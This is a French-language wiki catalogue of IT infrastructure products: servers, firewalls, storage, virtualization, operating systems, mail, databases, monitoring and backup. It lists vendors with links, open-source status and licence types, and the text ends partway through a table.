# Foure Tout

# Catalogue De produits

### <span style="text-decoration:underline;color:rgb(52,73,94);">**I. Hardware**</span>

#### <span style="color:rgb(35,111,161);">**1.1 Matériel serveur**</span>

Les principaux constructeurs sont :

- [HPE](https://www.hpe.com/fr/fr/hpe-proliant-servers.html)
- [DELL](https://www.dell.com/fr-fr/shop/scc/sc/servers)
- [Supermicro](https://www.supermicro.com/en/)

Chaque constructeur propose, en plus des serveurs tour ou des serveurs rack 1 ou 2U, des solutions de châssis et de lames pour créer une infrastructure personnalisée.

Chaque constructeur dispose également de sa solution de prise à distance hardware, centralisée ou non comme [HPE iLo](https://www.hpe.com/fr/fr/what-is/ilo.html) par exemple

<p class="callout success">**Astuce** : Pour du matériel serveur, il y a également moyen de l'assembler soi-même mais cela requiers une connaissances poussée des composants et de leur performances ainsi que de leurs interactions.</p>

---

### <span style="text-decoration:underline;color:rgb(52,73,94);">**II. Réseau**</span>

#### <span style="color:rgb(35,111,161);">**2.1 Matériel réseau**</span>

Les principaux constructeurs sont :

- [Cisco](https://www.cisco.com/c/fr_fr/solutions/enterprise-networks/solution-listing.html)
- [HPE aruba](https://www.hpe.com/fr/fr/aruba-central.html)
- [Huawei](https://e.huawei.com/fr/solutions/enterprise-network)
- [Supermicro](https://www.supermicro.com/en/)

Si l'on veut payer moins cher la connectique, il y a ce site : [FS](https://www.fs.com/fr/c/optical-transceivers-9)

#### <span style="color:rgb(35,111,161);">**2.2 Pare feu**</span>

Les principaux constructeurs proposent à la fois des appliance matérielles et des solutions logicielles généralement installées sur celles-ci.

<table id="bkmrk-nom-de-produit-open--1" style="border-collapse:collapse;width:83.5714%;height:190px;"><colgroup><col style="width:27.9607%;"></col><col style="width:12.4111%;"></col><col style="width:10.5566%;"></col><col style="width:17.5468%;"></col><col style="width:31.5271%;"></col></colgroup><tbody><tr style="height:29.8px;"><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Nom de produit**</td><td style="background-color:rgb(194,224,244);">**Appliance**</td><td style="background-color:rgb(194,224,244);">**Logiciel**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Open source**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Type de licences**</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">[Sophos XG](https://www.sophos.com/fr-fr/products/next-gen-firewall)</td><td class="align-center" style="background-color:rgb(191,237,210);">oui</td><td class="align-center" style="background-color:rgb(191,237,210);">oui</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);">non</td><td class="align-center" style="background-color:rgb(191,237,210);">gratuit pour un usage personnel</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">[fortinet](https://www.fortinet.com/fr/products/next-generation-firewall)</td><td class="align-center" style="background-color:rgb(191,237,210);">oui</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);">non</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);">non</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);">Achat + abonnement</td></tr><tr style="height:29.8px;"><td style="height:29.8px;">[Checkpoint](https://www.checkpoint.com/fr/solutions/hybrid-mesh-firewall/)</td><td class="align-center" style="background-color:rgb(191,237,210);">oui</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);">non</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);">non</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);">Achat + abonnement</td></tr><tr><td>[Stormshield](https://www.stormshield.com/fr/)</td><td class="align-center" style="background-color:rgb(191,237,210);">oui</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);">non</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);">non</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);">Achat + abonnement</td></tr><tr><td>[OPNsense](https://opnsense.org/)</td><td class="align-center" style="background-color:rgb(191,237,210);">oui</td><td class="align-center" style="background-color:rgb(191,237,210);">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">community / abonnement</td></tr><tr style="height:29.8px;"><td style="height:29.8px;">[Pfsense](https://www.pfsense.org/)</td><td class="align-center" style="background-color:rgb(191,237,210);">oui</td><td class="align-center" style="background-color:rgb(191,237,210);">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">community / abonnement</td></tr></tbody></table>

*\* il existe bien d'autres solutions pour les pare-feu comme [Zyxel](https://www.zyxel.com/fr/fr). Mais à l'heure actuelle, ceux-ci sont très en retard sur le marché ou proposent des produits ne répondant pas vraiment aux considérations actuelles.*

---

### <span style="text-decoration:underline;color:rgb(52,73,94);">**III. Stockage**</span>

#### <span style="color:rgb(35,111,161);">**3.1 Baies de stockage**</span>

Les principaux constructeurs de baies de stockage sont :

- [HPE](https://www.hpe.com/fr/fr/storage.html)
- [DELL](https://www.dell.com/fr-fr/shop/scc/sc/storage-products)
- [Synology](https://www.synology.com/fr-fr)
- [Supermicro](https://www.supermicro.com/en/)
- [TrueNAS](https://www.truenas.com/)

#### <span style="color:rgb(35,111,161);">**3.2 NAS**</span>

Pour des NAS bureautiques :

- <span style="text-decoration:underline;">[Synology](https://www.synology.com/fr-fr)</span>
- [QNAP](https://www.qnap.com/fr-fr/)
- [TrueNAS](https://www.truenas.com/)

#### <span style="color:rgb(35,111,161);">**3.3 Appliance logicielles**</span>

Si Truenas propose des solutions matérielles, il est possible d'installer sa solution logicielle sur une appliance ou un NAS.

De plus il en existe des versions gratuites que l'on peut même tester en VM.

- <span style="background-color:rgb(248,202,198);">[Truenas core](https://www.truenas.com/truenas-core/) (idéal pour des NAS bureautique)</span>
- <span style="background-color:rgb(248,202,198);">[Truenas scale](https://www.truenas.com/truenas-community-edition/) (idéal pour des baies de stockage)</span>

*\*dépréciés, remplacés par :* [TrueNas Community](https://www.truenas.com/download-truenas-community-edition/)

---

### <span style="text-decoration:underline;color:rgb(52,73,94);">**IV. Infrastructure / virtualisation**</span>

#### <span style="color:rgb(35,111,161);">**4.1 Virtualisation**</span>


##### <span style="color:rgb(53,152,219);">*4.1.1 Bureautique*</span>

<table id="bkmrk-nom-de-produit-open-" style="border-collapse:collapse;width:68.2143%;height:100.582px;"><colgroup><col style="width:40.2098%;"></col><col style="width:31.1189%;"></col><col style="width:28.6713%;"></col></colgroup><tbody><tr style="height:29.7869px;"><td class="align-center" style="background-color:rgb(194,224,244);height:29.7869px;">**Nom de produit**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.7869px;">**Open source**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.7869px;">**Type de licences**</td></tr><tr style="height:35.3977px;"><td style="height:35.3977px;">[VMware workstation/fusion PRO](https://blogs.vmware.com/workstation/2024/05/vmware-workstation-pro-now-available-free-for-personal-use.html)</td><td class="align-center" style="height:35.3977px;background-color:rgb(248,202,198);">non</td><td class="align-center" style="height:35.3977px;background-color:rgb(191,237,210);">Gratuit</td></tr><tr style="height:35.3977px;"><td style="height:35.3977px;">[VirtualBox](https://www.virtualbox.org/)</td><td class="align-center" style="height:35.3977px;background-color:rgb(191,237,210);">oui</td><td class="align-center" style="height:35.3977px;background-color:rgb(191,237,210);">Gratuit</td></tr></tbody></table>

##### <span style="color:rgb(53,152,219);">*4.1.2 Infrastructure*</span>

<table id="bkmrk-nom-de-produit-open--2" style="border-collapse:collapse;width:76.0714%;height:190px;"><colgroup><col style="width:40.2913%;"></col><col style="width:31.068%;"></col><col style="width:28.6408%;"></col></colgroup><tbody><tr style="height:29.8px;"><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Nom de produit**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Open source**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Type de licences**</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">[VMware esxi / Vcenter (vsphere)](https://www.vmware.com/products/cloud-infrastructure/vsphere)</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);">non</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);">ESXi gratuit, vcenter payant</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">[Microsoft Hyper-V](https://learn.microsoft.com/fr-fr/windows-server/virtualization/hyper-v/hyper-v-overview)</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);">non</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);">Achat</td></tr><tr style="height:29.8px;"><td style="height:29.8px;">[RedHat Openshift](https://www.redhat.com/en/technologies/cloud-computing/openshift)</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">oui</td><td class="align-center" style="background-color:rgb(248,202,198);height:29.8px;">Abonnement</td></tr><tr style="height:29.8px;"><td style="height:29.8px;">[Proxmox VE](https://www.proxmox.com/en/products/proxmox-virtual-environment/overview)</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">community / abonnement</td></tr><tr style="height:29.8px;"><td style="height:29.8px;">[OKD](https://docs.okd.io/)</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">upstream</td></tr></tbody></table>

#### **<span style="color:rgb(35,111,161);">4.2 Conteneurisation</span>** 

<table id="bkmrk-nom-de-produit-open--3" style="border-collapse:collapse;width:76.0714%;height:190px;"><colgroup><col style="width:40.2769%;"></col><col style="width:31.0305%;"></col><col style="width:28.6797%;"></col></colgroup><tbody><tr style="height:29.8px;"><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Nom de produit**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Open source**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Type de licences**</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">[Docker](https://docs.docker.com/engine/install/)</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">gratuit</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">[Kubernetes](https://kubernetes.io/)</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">gratuit / support</td></tr><tr style="height:29.8px;"><td style="height:29.8px;">[RedHat Openshift](https://www.redhat.com/en/technologies/cloud-computing/openshift)</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">oui</td><td class="align-center" style="background-color:rgb(248,202,198);height:29.8px;">Abonnement</td></tr><tr style="height:29.8px;"><td style="height:29.8px;">[Proxmox VE](https://www.proxmox.com/en/products/proxmox-virtual-environment/overview)</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">Community / support</td></tr><tr style="height:29.8px;"><td style="height:29.8px;">[OKD](https://docs.okd.io/)</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">upstream</td></tr><tr><td>[KASM](https://www.kasmweb.com/ "KASM")</td><td class="align-center" style="background-color:rgb(191,237,210);height:29.8px;">oui</td><td class="align-center" style="background-color:rgb(248,202,198);height:29.8px;">Abonnement</td></tr></tbody></table>

Pour gérer les conteneurs (docker notamment), [Portainer](https://www.portainer.io/) ou [Arcane](https://getarcane.app/ "arcane")

Il existe une version community et une version enterprise (gratuite jusqu’à 3 nœuds).

---

### <span style="text-decoration:underline;color:rgb(52,73,94);">**V. OS Systèmes**</span>

#### <span style="color:rgb(35,111,161);">**5.1 Clients**</span>

<table id="bkmrk-nom-de-produit-open--4" style="border-collapse:collapse;width:75.9524%;height:282.585px;"><colgroup><col style="width:40.2769%;"></col><col style="width:31.0305%;"></col><col style="width:28.6797%;"></col></colgroup><tbody><tr style="height:29.7869px;"><td class="align-center" style="background-color:rgb(194,224,244);height:29.7869px;">**Nom de produit**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.7869px;">**Open source**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.7869px;">**Type de licences**</td></tr><tr style="height:35.3977px;"><td style="height:35.3977px;">Windows 11</td><td class="align-center" style="height:35.3977px;background-color:rgb(248,202,198);">non</td><td class="align-center" style="height:35.3977px;background-color:rgb(248,202,198);">Payant</td></tr><tr style="height:46.5057px;"><td style="height:46.5057px;">MAC OS</td><td class="align-center" style="height:46.5057px;background-color:rgb(248,202,198);">non</td><td class="align-center" style="height:46.5057px;background-color:rgb(248,202,198);">Payant

(packagé matériel)

</td></tr><tr style="height:35.2983px;"><td style="height:35.2983px;">[CentOS stream](https://www.centos.org/centos-stream/)</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">Upstream</td></tr><tr style="height:35.2983px;"><td style="height:35.2983px;">[Debian](https://www.debian.org/index.fr.html)</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;"> oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">Gratuit </td></tr><tr style="height:35.2983px;"><td style="height:35.2983px;">[RedHat](https://www.redhat.com/fr)</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">oui</td><td class="align-center" style="background-color:rgb(248,202,198);height:35.2983px;">Abonnement</td></tr><tr style="height:35.2983px;"><td style="height:35.2983px;">[Ubuntu](https://www.ubuntu-fr.org/)</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">gratuit / abonnement</td></tr></tbody></table>

#### <span style="color:rgb(35,111,161);">**5.2 Servers**</span>

<table id="bkmrk-nom-de-produit-open--5" style="border-collapse:collapse;width:75.9524%;height:282.585px;"><colgroup><col style="width:40.2769%;"></col><col style="width:31.0305%;"></col><col style="width:28.6797%;"></col></colgroup><tbody><tr style="height:29.7869px;"><td class="align-center" style="background-color:rgb(194,224,244);height:29.7869px;">**Nom de produit**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.7869px;">**Open source**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.7869px;">**Type de licences**</td></tr><tr style="height:35.3977px;"><td style="height:35.3977px;">[Windows Server 2022 &amp; 2025](https://www.microsoft.com/fr-fr/evalcenter)</td><td class="align-center" style="height:35.3977px;background-color:rgb(248,202,198);">non</td><td class="align-center" style="height:35.3977px;background-color:rgb(248,202,198);">Payant</td></tr><tr style="height:35.2983px;"><td style="height:35.2983px;">[CentOS stream](https://www.centos.org/centos-stream/)</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">Upstream</td></tr><tr style="height:35.2983px;"><td style="height:35.2983px;">[Debian](https://www.debian.org/index.fr.html)</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;"> oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">Gratuit </td></tr><tr style="height:35.2983px;"><td style="height:35.2983px;">[RedHat](https://www.redhat.com/fr)</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">oui</td><td class="align-center" style="background-color:rgb(248,202,198);height:35.2983px;">Abonnement</td></tr><tr style="height:35.2983px;"><td style="height:35.2983px;">[Ubuntu](https://www.ubuntu-fr.org/)</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">gratuit / abonnement</td></tr></tbody></table>

---

### <span style="text-decoration:underline;color:rgb(52,73,94);">**VI. Produits / Services**</span>


#### <span style="color:rgb(35,111,161);">**5.1 Messagerie**</span>

<table id="bkmrk-nom-de-produit-open--6" style="border-collapse:collapse;width:75.9524%;height:282.585px;"><colgroup><col style="width:40.3443%;"></col><col style="width:31.0824%;"></col><col style="width:28.7277%;"></col></colgroup><tbody><tr style="height:29.7869px;"><td class="align-center" style="background-color:rgb(194,224,244);height:29.7869px;">**Nom de produit**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.7869px;">**Open source**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.7869px;">**Type de licences**</td></tr><tr style="height:35.3977px;"><td style="height:35.3977px;">[Microsoft exchange 2019 CU12](https://www.microsoft.com/en-us/download/details.aspx?id=104131)</td><td class="align-center" style="height:35.3977px;background-color:rgb(248,202,198);">non</td><td class="align-center" style="height:35.3977px;background-color:rgb(248,202,198);">Payant</td></tr><tr style="height:35.2983px;"><td style="height:35.2983px;">[Zimbra](https://www.zimbra.com/)</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;"> oui</td><td class="align-center" style="background-color:rgb(248,202,198);height:35.2983px;">Payant (depuis 2022) </td></tr><tr style="height:35.2983px;"><td style="height:35.2983px;">[Postfix](https://www.postfix.org/)</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">gratuit</td></tr></tbody></table>

#### <span style="color:rgb(35,111,161);">**5.2 Workspaces**</span>

<table id="bkmrk-nom-de-produit-open--7" style="border-collapse:collapse;width:75.9524%;height:282.585px;"><colgroup><col style="width:40.3454%;"></col><col style="width:31.0832%;"></col><col style="width:28.7284%;"></col></colgroup><tbody><tr style="height:29.7869px;"><td class="align-center" style="background-color:rgb(194,224,244);height:29.7869px;">**Nom de produit**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.7869px;">**Open source**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.7869px;">**Type de licences**</td></tr><tr style="height:35.3977px;"><td style="height:35.3977px;">[Sharepoint Server 2019](https://www.microsoft.com/fr-fr/microsoft-365/sharepoint/sharepoint-server)</td><td class="align-center" style="height:35.3977px;background-color:rgb(248,202,198);">non</td><td class="align-center" style="height:35.3977px;background-color:rgb(248,202,198);">Payant</td></tr><tr style="height:35.2983px;"><td style="height:35.2983px;">[Nextcloud](https://nextcloud.com/fr/installer/#community-projects)</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">gratuit / support</td></tr><tr><td>[Owncloud](https://owncloud.com/)</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">Community / enterprise</td></tr><tr><td>[Opencloud](https://opencloud.eu/en "Opencloud")</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">Community / enterprise</td></tr></tbody></table>

#### <span style="color:rgb(35,111,161);">**5.3 Databases**</span>

<table id="bkmrk-nom-de-produit-open--8" style="border-collapse:collapse;width:75.9524%;height:136px;"><colgroup><col style="width:40.3433%;"></col><col style="width:31.0816%;"></col><col style="width:28.7269%;"></col></colgroup><tbody><tr style="height:29.8px;"><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Nom de produit**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Open source**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Type de licences**</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">[Microsoft SQL server 2025](https://www.microsoft.com/fr-fr/evalcenter/evaluate-sql-server-2025)</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);">non</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);">Payant</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">[Mysql](https://www.mysql.com/fr/)</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;">gratuit</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">[MariaDB](https://mariadb.org/)</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;">gratuit</td></tr><tr><td>[PostgreSQL](https://www.postgresql.org/)</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;">gratuit</td></tr></tbody></table>

#### <span style="color:rgb(35,111,161);">**5.4 Supervision**</span>

<table id="bkmrk-nom-de-produit-open--9" style="border-collapse:collapse;width:75.9524%;height:136px;"><colgroup><col style="width:40.3454%;"></col><col style="width:31.0832%;"></col><col style="width:28.7284%;"></col></colgroup><tbody><tr style="height:29.8px;"><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Nom de produit**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Open source**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Type de licences**</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">[Nagios](https://www.nagios.org/ "Nagios")</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.2983px;">Community / enterprise</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">[prometheus](https://prometheus.io/download/ "Prometheus")</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;">gratuit</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">[Zabbix](https://www.zabbix.com/)</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;">gratuit</td></tr></tbody></table>

- *Pour les services de supervision, ne pas oublier d'installer les agents correspondants (zabbix agent, NSclient++)*
- *Possibilité de gérer des dashboards plus complets avec : [Grafana](https://grafana.com/ "Grafana")*

#### <span style="color:rgb(35,111,161);">**5.5 Déploiement/gestion de parc**</span>

<table id="bkmrk-nom-de-produit-open--10" style="border-collapse:collapse;width:75.9524%;height:136px;"><colgroup><col style="width:40.3454%;"></col><col style="width:31.0832%;"></col><col style="width:28.7284%;"></col></colgroup><tbody><tr style="height:29.8px;"><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Nom de produit**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Open source**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;">**Type de licences**</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">[Foreman](https://theforeman.org/ "Foreman")</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;">gratuit</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">[Fog](https://fogproject.org/ "Fog")</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;">gratuit</td></tr><tr><td style="height:35.4px;">[GLPI](https://www.glpi-project.org/fr/ "GLPI")</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;">Community / Abonnement</td></tr></tbody></table>

#### <span style="color:rgb(35,111,161);">**5.6 SIEM / XDR**</span>

<table id="bkmrk-nom-de-produit-open--11" style="border-collapse:collapse;width:75.9524%;height:136px;"><tbody><tr style="height:29.8px;"><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;width:33.281%;">**Nom de produit**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;width:33.281%;">**Open source**</td><td class="align-center" style="background-color:rgb(194,224,244);height:29.8px;width:33.281%;">**Type de licences**</td></tr><tr><td style="width:33.281%;">[Elastic Security](https://www.elastic.co/fr/pricing "Elastic Security")</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);width:33.281%;">non</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);width:33.281%;">Payant</td></tr><tr><td style="width:33.281%;">[Sophos](https://www.sophos.com/fr-fr/products/endpoint-security/edr "Sophos")</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);width:33.281%;">non</td><td class="align-center" style="height:35.4px;background-color:rgb(248,202,198);width:33.281%;">Payant</td></tr><tr style="height:35.4px;"><td style="height:35.4px;width:33.281%;">[Wazuh](https://wazuh.com/install/ "Wazuh")</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;width:33.281%;">oui</td><td class="align-center" style="background-color:rgb(191,237,210);height:35.4px;width:33.281%;">gratuit / ambassadeur</td></tr></tbody></table>

---

### <span style="text-decoration:underline;color:rgb(52,73,94);">**VII. Logiciels**</span>

---

### <span style="text-decoration:underline;color:rgb(52,73,94);">**VIII. Archives**</span>


#### <span style="color:rgb(35,111,161);">**7.1 Offres web**</span>

<table id="bkmrk-type-nom-lien-cloud-" style="border-collapse:collapse;width:100%;height:495.783px;"><colgroup><col style="width:15.0179%;"></col><col style="width:36.472%;"></col><col style="width:48.5101%;"></col></colgroup><tbody><tr style="height:29.8px;"><td class="align-center" style="background-color:rgb(194,224,244);vertical-align:middle;height:29.8px;">Nom</td><td class="align-center" style="background-color:rgb(194,224,244);vertical-align:middle;height:29.8px;">Type</td><td class="align-center" style="background-color:rgb(194,224,244);vertical-align:middle;height:29.8px;">Lien</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">Apache Airflow  
</td><td style="height:35.4px;">Automation / Scheduling / Workflow manager  
</td><td style="height:35.4px;">[https://airflow.apache.org/](https://airflow.apache.org/)

</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">Drupal</td><td style="height:35.4px;">CMS</td><td style="height:35.4px;">[Drupal core | Drupal.org](https://www.drupal.org/project/drupal)</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">Dolibarr</td><td style="height:35.4px;">ERP</td><td style="height:35.4px;">[Dolibarr Open Source ERP and CRM - Web suite for business](https://www.dolibarr.org/)</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">NextCloud</td><td style="height:35.4px;">Cloud / Travail collaboratif

</td><td style="height:35.4px;">[Nextcloud - Online collaboration platform](https://nextcloud.com/fr/)</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">Gitlab</td><td style="height:35.4px;">Git / Travail collaboratif</td><td style="height:35.4px;">[GitLab Community | GitLab | GitLab](https://about.gitlab.com/community/)

</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">GLPI</td><td style="height:35.4px;">ITSM/Ticketing</td><td style="height:35.4px;">[Accueil - GLPI Project (glpi-project.org)](https://glpi-project.org/fr/)

</td></tr><tr style="height:37.7833px;"><td style="height:37.7833px;">Grafana</td><td style="height:37.7833px;">Reporting / KPI</td><td style="height:37.7833px;">[Grafana: The open observability platform | Grafana Labs](https://grafana.com/)

</td></tr><tr><td>NodeRed</td><td>Node.js automation engine</td><td>[Low-code programming for event-driven applications : Node-RED](https://nodered.org/)

</td></tr><tr><td>OpenBAO</td><td>Secret management &amp; PKI</td><td>[OpenBao](https://openbao.org/)

</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">OSTicket</td><td style="height:35.4px;">Ticketing</td><td style="height:35.4px;">[osTicket | Support Ticketing System](https://osticket.com/)

</td></tr><tr><td>PassBolt</td><td>Password manager</td><td>[Open Source Password Manager for Teams | Passbolt](https://www.passbolt.com/)</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">PHPbb</td><td style="height:35.4px;">Forum</td><td style="height:35.4px;">[phpBB • Free and Open Source Forum Software](https://www.phpbb.com/)</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">PHPipam</td><td style="height:35.4px;">IPAM</td><td style="height:35.4px;">[phpIPAM IPAM IP address management software](https://phpipam.net/)

</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">PHPMyAdmin</td><td style="height:35.4px;">SQL Web Admin</td><td style="height:35.4px;">[phpMyAdmin](https://www.phpmyadmin.net/)

</td></tr><tr style="height:35.4px;"><td style="height:35.4px;">Sonatype Nexus</td><td style="height:35.4px;">Repo</td><td style="height:35.4px;">[Sonatype Nexus Repository](https://help.sonatype.com/en/sonatype-nexus-repository.html)

</td></tr><tr><td>Webmin  
</td><td>Centre d'administration pour les Linux  
</td><td>[https://webmin.com/](https://webmin.com/)

</td></tr><tr style="height:38.8px;"><td style="height:38.8px;">Wordpress</td><td style="height:38.8px;">CMS  
</td><td style="height:38.8px;">[WordPress.com](https://wordpress.com/fr/)</td></tr></tbody></table>

---

#### **7.2 Produits**

<table id="bkmrk-type-nom-lien-%C2%A0-%C2%A0-%C2%A0" style="border-collapse:collapse;width:100%;height:704.39px;"><colgroup><col style="width:25.7202%;"></col><col style="width:32.2526%;"></col><col style="width:42.1508%;"></col></colgroup><tbody><tr style="height:29.7969px;"><td class="align-center" style="background-color:rgb(194,224,244);vertical-align:middle;height:29.7969px;">Type</td><td class="align-center" style="background-color:rgb(194,224,244);vertical-align:middle;height:29.7969px;">Nom</td><td class="align-center" style="background-color:rgb(194,224,244);vertical-align:middle;height:29.7969px;">Lien</td></tr><tr style="height:57.7812px;"><td style="height:57.7812px;">Backup / sauvegarde</td><td style="height:57.7812px;"> Veeam availability suite</td><td style="height:57.7812px;"> [Free Backup Software For Windows, VMware, &amp; More - Veeam](https://www.veeam.com/virtual-machine-backup-solution-free.html)</td></tr><tr style="height:35.3906px;"><td style="height:35.3906px;">  
</td><td style="height:35.3906px;">Veeam agent For windows</td><td style="height:35.3906px;">[Veeam Software Downloads | Veeam](https://www.veeam.com/downloads.html)</td></tr><tr><td></td><td>Proxmox backup server</td><td>[Proxmox Backup Server - Open-Source Enterprise Backup Solution](https://www.proxmox.com/en/proxmox-backup-server/overview)</td></tr><tr><td>IDE / Devellopement

